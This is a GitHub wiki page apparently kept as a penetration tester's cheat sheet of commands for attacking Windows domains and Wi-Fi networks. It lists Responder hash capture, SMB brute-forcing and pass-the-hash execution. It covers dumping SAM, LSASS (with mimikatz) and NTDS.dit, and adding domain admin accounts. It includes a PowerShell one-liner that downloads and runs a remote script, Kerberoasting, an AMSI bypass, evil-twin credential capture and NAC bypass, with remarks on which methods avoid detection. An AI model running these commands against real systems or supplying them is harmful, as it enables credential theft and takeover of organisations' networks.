Skip to content
Nadeem Salim edited this page Dec 10, 2018 · 80 revisions

Welcome to the Pentest-Commands-and-dirty-scripts- wiki!

Nmap DNS lookup

nmap -sL -R --dns-servers 8.8.8.8 -iL hostnames.txt -vv -oA output

Eyewitness

./EyeWitness.py -f /root/blah.nessus --web -d COMPANY --timeout 20 --no-prompt --prepend-https --no-dns

Responder

Grab NTLM hashes off the network

Without wpad:

responder -I eth0

With wpad:

responder -I eth0 --wpad -b -f -F

Filter logs from logs folder and remove machine accounts:

sort -m *.txt | uniq -d | awk '!/\$/'

Cracking with John:

john SMB-NTLMv2-Client-172.20.22.217.txt --wordlist=/root/passwords.txt

Use hashcat on a more powerful box. This is only for easy wins.

Extract local admin hash from workstation/laptop

samdump2 SYSTEM SAM > hashes.txt

Grab employee names from Linkedin

theharvester -d blah.com -l 1000 -b linkedin

Change format to b.lah

awk '=FS tolower(substr(,1,1)$NF)' linkedin-user-list.txt | awk '{ print }'

Check usernames against AD:

Handy if you have generated a list from linkedin or a list of usernames.

nmap -p 88 1.1.1.1 --script krb5-enum-users --script-args krb5-enum-users.realm="DOMAIN"

username list is located at /usr/local/share/nmap/nselib/data/usernames.lst in Kali

Null sessions

Still works on infra that was upgraded.

net use \\IP_ADDRESS\ipc$ "" /user:""

Bruteforce using hydra:

hydra -L users.txt -p Password1 -m 'D' 172.20.11.55 smbnt -V

Bruteforce using net use:

@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL

Check SMB signing

nmap -script smb-security-mode -p445 -iL 445-open.txt -v10 -T4 -oA smb-signing awk -F "signing: disabled" '/^Nmap/ {a=$0} /signing: disabled/ {print a}' smb-signing.nmap | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > smb-disabled.txt

Running Shell commands as domain user from non-domain joined machine

When you have an initial set of compromised creds run these from a Virtual Machine.

C:\runas.exe /netonly /user:BLAHDOMAIN\blahuser “cmd.exe”

check dc: nltest /dsgetdc:domain.local

To change DC via registry to point at domain being tested:

HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services Netlogon Parameters “SiteName“ > DC1.domain.com

Create session for use with dumpsec net use \\10.0.0.1\ipc$ /user:domain.local\username password

Quick User lists and password policy enum

net users /domain

net group /domain "Domain Admins"

net accounts /domain

Note that the above commands do not work with runas. Below PowerView functions will work with runas.

Powerview:

. .\PowerView.ps1

Get-UserProperty -Properties samaccountname

Get-NetGroupMember

Get-DomainPolicy

Search shares and files using Invoke-FileFinder and Invoke-ShareFinder

Bloodhound

Run locally on non-domain joined machine (remember to add target domain to registry):

..\BloodHound.ps1

Invoke-BloodHound

Run from remote shell

Useful when you have a remote shell.

powershell Set-ExecutionPolicy RemoteSigned

powershell -command "& { . C:\BloodHound.ps1; Invoke-BloodHound }"

Run from web server or over Internet:

Use this when you cannot copy BloodHound.ps1 over to target.

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); Invoke-BloodHound"

Winexe to boxes (not opsec safe) - service is run. No cleanup.

pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%blahpassword cmd

pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%hash cmd

Impacket psexec.py to boxes (not opsec safe) - does cleanup after but leaves logs after installing and running service.

psexec.py user@IP

psexec.py user@IP -hashes ntlm:hash

Impacket wmiexec.py (opsec safe - unless WMI logging is enabled)

wmiexec.py user@IP

wmiexec.py user@IP -hashes ntlm:hash

Impacket smbclient (probably opsec safe as its just using SMB)

python smbclient.py domain/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:blah

Password dumping

From Live Kali on a workstation

samdump2 SYSTEM SAM > hashes.txt

Local

C:\> reg.exe save hklm\sam c:\temp\sam.save

C:\> reg.exe save hklm\security c:\temp\security.save

C:\> reg.exe save hklm\system c:\temp\system.save

secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

pwdump system sam

In Memory

C:\> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1

C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit

Domain

To find where NTDS is run the below:

reg.exe query hklm\system\currentcontrolset\services\ntds\parameters

vssadmin

C:\vssadmin list shadows

C:\vssadmin create shadow /for=C:

copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .

copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .

copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

secretsdump.py -system system.save -ntds ntds.dit LOCAL
 -just-dc-ntlm

vssadmin delete shadows /shadow={cd534584-a272-44ab-81e1-ab3f5fbe9b29}

ntdsutil

ntdsutil

ntdsutil: snapshot

ntdsutil: list all

ntdsutil: create

snapshot: mount 1

Cleanup snapshots:

snapshot: list all

snapshot: unmount 1

snapshot: list all

snapshot: delete 1

Add user to local admin and domain admin

Domain Admin

net user username password /ADD /DOMAIN

net group "Domain Admins" username /ADD /DOMAIN

Local Admin

net user username password /ADD

net localgroup Administrators username /ADD

Tasklist scraper

#!/bin/sh

for ip in $(cat ip.txt);do

pth-winexe -U Admin%hash //$ip "ipconfig"

pth-winexe -U Admin%hash //$ip "tasklist /v"

done

Kerberoasting

This is the best script:

https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1

Invoke-AutoKerberoast

Hashcat Alienware - kerbtgt hash cracking

sudo apt-get install nvidia-367

sudo nvidia-smi

reboot

sudo hashcat -I

hashcat -m 13100 kerb.txt ~/Downloads/realuniq.lst

LAPS - GetLAPSPasswords

https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1

Wireless setup and evil twin attack

Check if card is connected through USB:

lsusb

Edit sources.list to setup correct Kali source

/etc/apt/sources.list

deb http://http.kali.org/kali kali-rolling main non-free contrib

Update and dist-upgrade

apt-get update

apt-get dist-upgrade

reboot

Installing driver for card:

apt-get install realtek-rt188xxau-dkms

To manually kick in drivers:

modprobe 8812au

To check if drivers are all good to go:

modinfo 8812au

iwconfig

Basic sniffing:

airodump-ng wlan0

Setup card as AP to capture creds:

Either apt-get hostapd-wpe or clone from github repo:

git clone https://github.com/OpenSecurityResearch/hostapd-wpe

It needs some libs:

apt-get install libssl-dev libnl-genl-3-dev

Get hostapd

wget http://hostap.epitest.fi/releases/hostapd-2.6.tar.gz

tar -xvf hostapd-2.6.tar.gz

cd hostapd-2.6/

Patch hostapd-wpe to hostapd

patch -p1 < ../hostapd-wpe/hostapd-wpe.patch

cd hostapd/

Get the following packages to make:

apt-get install pkg-config

apt-get install libssl1.0-dev

make

Move to certs folder - make changes to server.cnf and ca.cnf to match you target SSIDs CN in cert.

cd ../../hostapd-wpe/

cd certs/

Bootstrap to setup the certs:

./bootstrap

Run hostapd-wpe to start capturing auth:

./hostapd-wpe hostapd-wpe.conf

Newer Kali config locations

/etc/hostapd-wpe

Basic troubleshooting for the card:

To kill processes card maybe attached to:

airmon-ng check kill

To use card with network manager:

service network-manager start

If card is hard of soft blocked by rfkill:

rfkill list all

rfkill unblock all

setup monitor mode

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

Change channels Set channel 6, width 40 MHz: $ sudo iw wlan0 set channel 6 HT40- Set channel 149, width 80 MHz: $ sudo iw wlan0 set freq 5745 80 5775 Power $ sudo iwconfig wlan0 txpower 30 or $ sudo iw wlan0 set txpower fixed 3000

Kali hotspot

Change name -> Settings>Sharing or Settings>Details>About.

Change password

nmcli connection modify Hotspot 802-11-wireless-security.key-mgmt wpa-psk 802-11-wireless-security.psk mypassword

Powershell AMSI Bypass

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

NAC Bypass with FENRIR

sysctl net.ipv4.ip_forward=1 ifconfig eth1 promisc ifconfig eth2 promisc

Important: Make sure to connect host to eth1 first,then eth2 to switch.

FENRIR > create_virtual_tap

FENRIR > set hostIface eth1 hostIface ===> eth1

FENRIR > set host_ip 192.168.31.135 host_ip ===> 192.168.31.135

FENRIR > set host_mac 509a4c505cda host_mac ===> 509a4c505cda

FENRIR > set netIface eth2 netIface ===> eth2

FENRIR > add_reverse_rule 137 multi IP New rule added : port = 137 type = multi proto = IP

FENRIR > add_reverse_rule 5355 multi IP New rule added : port = 5355 type = multi proto = IP

FENRIR > add_reverse_rule 445 unique IP New rule added : port = 445 type = unique proto = IP

FENRIR > run_debug

route add default gw 10.0.0.42

##MS17-010 Nmap Scan

nmap -Pn -p445 -open --script smb-vuln-ms17-010 ip_address

Clone this wiki locally